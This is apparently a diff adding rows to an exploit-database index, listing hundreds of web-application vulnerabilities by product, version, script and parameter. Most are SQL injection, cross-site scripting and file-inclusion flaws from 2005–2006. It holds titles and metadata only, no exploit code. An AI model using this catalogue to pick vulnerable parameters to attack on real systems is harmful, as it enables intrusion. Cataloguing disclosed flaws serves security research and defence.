+26813,exploits/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,webapps,php, +26814,exploits/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,webapps,php, +26815,exploits/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,webapps,php, +26817,exploits/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Bypass",2005-12-14,"Maksymilian Arciemowicz",webapps,php, +26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,webapps,php, +26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,webapps,php, +26820,exploits/asp/webapps/26820.txt,"ASP-DEV XM Forum - 'forum.asp' Cross-Site Scripting",2005-12-14,Dj_Eyes,webapps,asp, +26821,exploits/asp/webapps/26821.txt,"ASPBB 0.4 - 'topic.asp?TID' SQL Injection",2005-12-14,Dj_Eyes,webapps,asp, +26822,exploits/asp/webapps/26822.txt,"ASPBB 0.4 - 'forum.asp?FORUM_ID' SQL Injection",2005-12-14,Dj_Eyes,webapps,asp, +26823,exploits/asp/webapps/26823.txt,"ASPBB 0.4 - 'profile.asp?PROFILE_ID' SQL Injection",2005-12-14,Dj_Eyes,webapps,asp, +26824,exploits/php/webapps/26824.txt,"WikkaWiki 1.1.6 - 'TextSearch.php' Cross-Site Scripting",2005-12-14,r0t,webapps,php, +26826,exploits/php/webapps/26826.txt,"Netref 3.0 - 'index.php' SQL Injection",2005-12-14,syst3m_f4ult,webapps,php, +26831,exploits/php/webapps/26831.txt,"QuickPayPro 3.1 - 'tracking.details.php?trackingid' SQL Injection",2005-12-14,r0t,webapps,php, +26832,exploits/php/webapps/26832.txt,"QuickPayPro 3.1 - 'sales.view.php?customerid' SQL Injection",2005-12-14,r0t,webapps,php, +26836,exploits/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - 'index.php?_SERVER[REMOTE_ADDR]' Cross-Site Scripting",2005-12-14,rgod,webapps,php, +26837,exploits/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - 'option' Traversal Arbitrary File Access",2005-12-14,rgod,webapps,php, +26838,exploits/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php?page' Cross-Site Scripting",2005-12-15,B3g0k,webapps,php, +26839,exploits/php/webapps/26839.txt,"TML 0.5 - 'index.php?form' Cross-Site Scripting",2005-12-15,X1ngBox,webapps,php, +26840,exploits/php/webapps/26840.txt,"TML 0.5 - 'index.php?id' SQL Injection",2005-12-15,X1ngBox,webapps,php, +26841,exploits/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,webapps,php, +26842,exploits/cgi/webapps/26842.txt,"Sitenet BBS 2.0 - 'netboardr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,webapps,cgi, +26843,exploits/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - 'search.cgi?cid' Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,cgi, +26844,exploits/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script - 'Page' Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,php, +26845,exploits/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,cgi, +26846,exploits/cgi/webapps/26846.txt,"AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,webapps,cgi, +26847,exploits/cgi/webapps/26847.txt,"eDatCat 3.0 - EDCstore.pl Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,cgi, +26848,exploits/cgi/webapps/26848.txt,"Soft4e ECW-Cart 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,webapps,cgi, +26849,exploits/cgi/webapps/26849.txt,"ECTOOLS Onlineshop 1.0 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,cgi, +26850,exploits/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,cgi, +26851,exploits/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 - 'CP-APP.cgi' Cross-Site Scripting",2005-12-15,r0t3d3Vil,webapps,cgi, +26852,exploits/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,webapps,cgi, +26853,exploits/php/webapps/26853.txt,"EZDatabase 2.1.2 - 'index.php?p' Local File Inclusion",2005-12-16,r0t3d3Vil,webapps,php, +26854,exploits/php/webapps/26854.txt,"EZDatabase 2.1.2 - 'index.php?db_id' SQL Injection",2005-12-16,r0t3d3Vil,webapps,php, +26855,exploits/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,webapps,php, +26856,exploits/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,webapps,php, +26857,exploits/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,webapps,php, +26858,exploits/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,webapps,cgi, +26859,exploits/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,webapps,cgi, +26860,exploits/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl?board' Cross-Site Scripting",2005-12-16,r0t3d3Vil,webapps,cgi, +26861,exploits/cgi/webapps/26861.txt,"ScareCrow 2.13 - 'forum.cgi?forum' Cross-Site Scripting",2005-12-16,r0t3d3Vil,webapps,cgi, +26862,exploits/cgi/webapps/26862.txt,"ScareCrow 2.13 - 'profile.cgi?user' Cross-Site Scripting",2005-12-16,r0t3d3Vil,webapps,cgi, +26863,exploits/cgi/webapps/26863.txt,"ScareCrow 2.13 - 'post.cgi?forum' Cross-Site Scripting",2005-12-16,r0t3d3Vil,webapps,cgi, +26864,exploits/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting",2005-12-16,r0t3d3Vil,webapps,cgi, +26865,exploits/cgi/webapps/26865.txt,"WebCal 3.0 4 - 'webcal.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,"Stan Bubrouski",webapps,cgi, +26866,exploits/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Full Path Disclosure",2005-12-17,king_purba,webapps,php, +26867,exploits/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel & lukman",webapps,php, +26868,exploits/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,webapps,php, +26870,exploits/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,webapps,php, +26871,exploits/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,webapps,php, +26872,exploits/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,webapps,php, +26873,exploits/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' SQL Injection",2005-12-19,admin@hamid.ir,webapps,asp, +26874,exploits/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,webapps,asp, +26875,exploits/asp/webapps/26875.txt,"allinta CMS 2.3.2 - 'faq.asp?s' Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,asp, +26876,exploits/asp/webapps/26876.txt,"allinta CMS 2.3.2 - 'search.asp?searchQuery' Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,asp, +26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26878,exploits/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php, +26879,exploits/php/webapps/26879.txt,"Cofax 2.0 - search.htm Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26880,exploits/php/webapps/26880.txt,"FLIP 0.9.0.1029 - 'text.php?name' Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26881,exploits/php/webapps/26881.txt,"FLIP 0.9.0.1029 - 'forum.php?frame' Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26882,exploits/cfm/webapps/26882.txt,"Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,cfm, +26883,exploits/php/webapps/26883.txt,"Libertas Enterprise CMS 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26884,exploits/php/webapps/26884.txt,"Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php, +26885,exploits/php/webapps/26885.txt,"Lighthouse CMS 1.1 - Search Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26888,exploits/ios/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent Cross-Site Scripting",2013-07-16,Vulnerability-Lab,webapps,ios, +26890,exploits/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,webapps,ios, +26893,exploits/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent Cross-Site Scripting",2013-07-16,Vulnerability-Lab,webapps,php, +26894,exploits/php/webapps/26894.txt,"Saurus CMS 4.7.1 - Multiple Vulnerabilities",2013-07-16,waraxe,webapps,php, +26895,exploits/php/webapps/26895.txt,"Magnolia Search Module 2.1 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php, +26896,exploits/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 - 'index.php' SQL Injection",2005-12-19,r0t,webapps,php, +26897,exploits/php/webapps/26897.txt,"Direct News 4.9 - 'index.php' SQL Injection",2005-12-19,r0t,webapps,php, +26898,exploits/php/webapps/26898.txt,"ODFaq 2.1 - 'faq.php' SQL Injection",2005-12-19,r0t,webapps,php, +26899,exploits/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,webapps,php, +26900,exploits/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php?page' SQL Injection",2005-12-19,r0t,webapps,php, +26901,exploits/php/webapps/26901.txt,"Miraserver 1.0 RC4 - 'newsitem.php?id' SQL Injection",2005-12-19,r0t,webapps,php, +26902,exploits/php/webapps/26902.txt,"Miraserver 1.0 RC4 - 'article.php?cat' SQL Injection",2005-12-19,r0t,webapps,php, +26903,exploits/asp/webapps/26903.txt,"Baseline CMS 1.95 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t,webapps,asp, +26904,exploits/php/webapps/26904.txt,"Bitweaver 1.1.1 Beta - 'list_galleries.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,webapps,php, +26905,exploits/php/webapps/26905.txt,"Bitweaver 1.1.1 - 'view_post.php?post_id' Cross-Site Scripting",2005-12-19,r0t,webapps,php, +26906,exploits/php/webapps/26906.txt,"Bitweaver 1.1.1 - 'view.php?blog_id' Cross-Site Scripting",2005-12-19,r0t,webapps,php, +26907,exploits/php/webapps/26907.txt,"Bitweaver 1.1.1 - 'message_box.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,webapps,php, +26908,exploits/php/webapps/26908.txt,"Bitweaver 1.1.1 - 'my.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,webapps,php, +26909,exploits/cfm/webapps/26909.txt,"Community Enterprise 4.x - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,cfm, +26910,exploits/cfm/webapps/26910.txt,"E-Publish 2.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,cfm, +26911,exploits/php/webapps/26911.txt,"Komodo CMS 2.1 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php, +26912,exploits/php/webapps/26912.txt,"Mercury CMS 4.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php, +26914,exploits/cgi/webapps/26914.txt,"Extensis Portfolio Netpublish Server 7.0 - Server.NP Directory Traversal",2005-12-20,"Andy Davis",webapps,cgi, +26916,exploits/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",webapps,php, +26917,exploits/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",webapps,cgi, +26918,exploits/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",webapps,php, +26919,exploits/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - 'Title' Cross-Site Scripting",2005-12-20,$um$id,webapps,php, +26920,exploits/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - 'CategoryResults.cfm' Multiple SQL Injections",2005-12-20,r0t3d3Vil,webapps,cfm, +26921,exploits/php/webapps/26921.txt,"Tolva 0.1 - 'Usermods.php' Remote File Inclusion",2005-12-21,xbefordx,webapps,php, +26923,exploits/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",webapps,php, +26924,exploits/jsp/webapps/26924.txt,"OpenEdit 4.0 - Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,jsp, +26925,exploits/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,php, +26926,exploits/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26927,exploits/asp/webapps/26927.txt,"SiteEnable 3.3 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26928,exploits/asp/webapps/26928.txt,"IntranetApp 3.3 - 'login.asp?ret_page' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26929,exploits/asp/webapps/26929.txt,"IntranetApp 3.3 - 'content.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t,webapps,asp, +26930,exploits/asp/webapps/26930.txt,"ProjectApp 3.3 - 'forums.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26931,exploits/asp/webapps/26931.txt,"ProjectApp 3.3 - 'search_employees.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26932,exploits/asp/webapps/26932.txt,"ProjectApp 3.3 - 'cat.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26933,exploits/cgi/webapps/26933.txt,"ProjectApp 3.3 - 'links.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,webapps,cgi, +26934,exploits/asp/webapps/26934.txt,"ProjectApp 3.3 - 'pmprojects.asp?projectid' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26935,exploits/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp?ret_page' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26936,exploits/asp/webapps/26936.txt,"ProjectApp 3.3 - 'default.asp?skin_number' Cross-Site Scripting",2005-12-21,r0t,webapps,asp, +26937,exploits/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,webapps,cgi, +26938,exploits/php/webapps/26938.txt,"Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings",2005-12-21,r0t3d3Vil,webapps,php, +26939,exploits/php/webapps/26939.txt,"Scoop 1.1 RC1 - Missing Story Error Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,php, +26940,exploits/asp/webapps/26940.txt,"Commercial Interactive Media SCOOP! 2.3 - 'articleSearch.asp' Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,asp, +26941,exploits/asp/webapps/26941.txt,"Commercial Interactive Media SCOOP! 2.3 - 'lostPassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,webapps,asp, +26942,exploits/asp/webapps/26942.txt,"Commercial Interactive Media SCOOP! 2.3 - 'account_login.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,webapps,asp, +26943,exploits/asp/webapps/26943.txt,"Commercial Interactive Media SCOOP! 2.3 - 'category.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,webapps,asp, +26944,exploits/asp/webapps/26944.txt,"Commercial Interactive Media SCOOP! 2.3 - 'articleZone.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,asp, +26945,exploits/asp/webapps/26945.txt,"Commercial Interactive Media SCOOP! 2.3 - 'prePurchaserRegistration.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,asp, +26946,exploits/asp/webapps/26946.txt,"Commercial Interactive Media SCOOP! 2.3 - 'requestDemo.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,asp, +26947,exploits/asp/webapps/26947.txt,"Sitekit CMS 6.6 - 'Default.aspx' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,webapps,asp, +26948,exploits/asp/webapps/26948.txt,"Sitekit CMS 6.6 - 'Request-call-back.html?ClickFrom' Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,asp, +26949,exploits/asp/webapps/26949.txt,"Sitekit CMS 6.6 - 'registration-form.html?ClickFrom' Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,asp, +26952,exploits/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,webapps,ios, +26953,exploits/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,webapps,ios, +26954,exploits/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,webapps,ios, +26955,exploits/php/webapps/26955.txt,"Xibo 1.2.2/1.4.1 - 'index.php?p' Directory Traversal",2013-07-18,Mahendra,webapps,php, +26956,exploits/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,webapps,windows, +26957,exploits/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,webapps,windows, +26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php, +26959,exploits/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,webapps,php, +26960,exploits/php/webapps/26960.txt,"Papoo 2.1.2 - 'Guestbook.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,webapps,php, +26961,exploits/php/webapps/26961.txt,"Papoo 2.1.2 - 'print.php' Multiple SQL Injections",2005-12-21,r0t3d3Vil,webapps,php, +26962,exploits/php/webapps/26962.txt,"PHPSlash 0.8.1 - 'article.php' SQL Injection",2005-12-21,r0t3d3Vil,webapps,php, +26963,exploits/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - 'news_and_events_new.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,webapps,asp, +26964,exploits/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - 'news.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,webapps,asp, +26965,exploits/php/webapps/26965.txt,"MusicBox 2.3 - 'type' SQL Injection",2005-12-22,"Medo HaCKer",webapps,php, +26968,exploits/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,webapps,php, +26969,exploits/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - 'Action' Cross-Site Scripting",2005-12-22,r0t3d3Vil,webapps,asp, +26972,exploits/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",webapps,jsp, +26973,exploits/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php?_load_article_details' SQL Injection",2005-12-27,"A. Ramos",webapps,php, +26974,exploits/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - 'addresses_export.php?queues' SQL Injection",2005-12-27,"A. Ramos",webapps,php, +26975,exploits/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - 'display_ticket_thread.php?ticket' SQL Injection",2005-12-27,"A. Ramos",webapps,php, +26976,exploits/php/webapps/26976.txt,"Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection",2005-12-27,retrogod@aliceposta.it,webapps,php, +26977,exploits/php/webapps/26977.txt,"Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection",2005-12-27,retrogod@aliceposta.it,webapps,php, +26978,exploits/php/webapps/26978.txt,"Dev Web Management System 1.5 - 'add.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,retrogod@aliceposta.it,webapps,php, +26979,exploits/php/webapps/26979.txt,"IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Remote File Inclusions",2005-12-27,"Tan Chew Keong",webapps,php, +26980,exploits/php/webapps/26980.txt,"IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Remote File Inclusions",2005-12-27,"Tan Chew Keong",webapps,php, +26981,exploits/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html?lang' Local File Inclusion",2005-12-27,"Tan Chew Keong",webapps,php, +26982,exploits/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion",2005-12-27,"Tan Chew Keong",webapps,php, +26983,exploits/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion",2005-12-27,"Tan Chew Keong",webapps,php, +26984,exploits/php/webapps/26984.txt,"IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",webapps,php, +26986,exploits/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,webapps,cfm, +40575,exploits/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,webapps,php, +26987,exploits/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,webapps,java, +26988,exploits/php/webapps/26988.txt,"Dream4 Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",webapps,php, +26989,exploits/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,webapps,php, +26990,exploits/php/webapps/26990.txt,"MyBB 1.0 - 'Globa.php' Cookie Data SQL Injection",2005-12-29,imei,webapps,php, +26991,exploits/asp/webapps/26991.html,"Web Wiz (Multiple Products) - SQL Injection",2005-12-30,DevilBox,webapps,asp, +26992,exploits/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,webapps,php, +26993,exploits/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,webapps,php, +26994,exploits/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,webapps,php, +26995,exploits/php/webapps/26995.txt,"phpDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",webapps,php, +26998,exploits/php/webapps/26998.txt,"OABoard 1.0 Forum - Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",webapps,php, +26999,exploits/php/webapps/26999.txt,"PHPBook 1.x - Mail Field PHP Code Injection",2005-12-29,"Aliaksandr Hartsuyeu",webapps,php, +27000,exploits/php/webapps/27000.txt,"VEGO Web Forum 1.x - Theme_ID SQL Injection",2005-12-28,"Aliaksandr Hartsuyeu",webapps,php, +27001,exploits/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script - SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",webapps,php, +27002,exploits/php/webapps/27002.txt,"Jevontech PHPenpals - PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",webapps,php, +27003,exploits/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php, +27004,exploits/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php, +27633,exploits/php/webapps/27633.txt,"MyBB 1.10 - 'member.php' Cross-Site Scripting",2006-04-12,o.y.6,webapps,php, +27005,exploits/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,webapps,hardware, +27006,exploits/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,webapps,hardware, +27439,exploits/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 - Print Action 't' Cross-Site Scripting",2006-03-17,Mr.SNAKE,webapps,php, +27440,exploits/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 - Mail Action 'MID' Cross-Site Scripting",2006-03-17,Mr.SNAKE,webapps,php, +27441,exploits/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 - Help Action 'HID' Cross-Site Scripting",2006-03-17,Mr.SNAKE,webapps,php, +27442,exploits/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 - Members Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,webapps,php, +27009,exploits/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,webapps,php, +27011,exploits/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",webapps,jsp, +27015,exploits/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",webapps,php, +27016,exploits/php/webapps/27016.txt,"Chimera Web Portal 0.2 - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php, +27017,exploits/php/webapps/27017.txt,"Chimera Web Portal 0.2 - 'linkcategory.php?id' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php, +27018,exploits/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - 'AdminName' SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",webapps,php, +27019,exploits/php/webapps/27019.txt,"vBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,webapps,php, +27020,exploits/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,webapps,php, +27021,exploits/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,webapps,cgi, +27022,exploits/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injections",2006-01-03,r0t,webapps,php, +27023,exploits/php/webapps/27023.txt,"INCOGEN Bugport 1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,webapps,php, +27025,exploits/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injections",2006-01-03,r0t,webapps,php, +27027,exploits/php/webapps/27027.txt,"Jax Calendar 1.34 - 'jax_calendar.php' SQL Injection",2005-12-26,r0t3d3Vil,webapps,php, +27028,exploits/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php, +27029,exploits/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - 'Invoices.php' SQL Injection",2005-12-25,r0t3d3Vil,webapps,php, +27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php, +27033,exploits/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",webapps,php, +27034,exploits/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp?Press_Release_ID' SQL Injection",2006-01-06,Preddy,webapps,asp, +27035,exploits/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp?Service_ID' SQL Injection",2006-01-06,Preddy,webapps,asp, +27036,exploits/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp?Product_ID' SQL Injection",2006-01-06,Preddy,webapps,asp, 